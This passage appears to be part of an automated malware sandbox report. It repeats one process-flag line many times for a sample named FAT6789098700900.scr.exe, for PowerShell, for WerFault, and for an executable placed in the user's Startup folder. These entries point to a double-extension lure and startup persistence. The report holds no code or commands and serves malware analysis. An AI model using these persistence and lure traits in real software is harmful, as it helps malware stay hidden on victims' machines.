                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
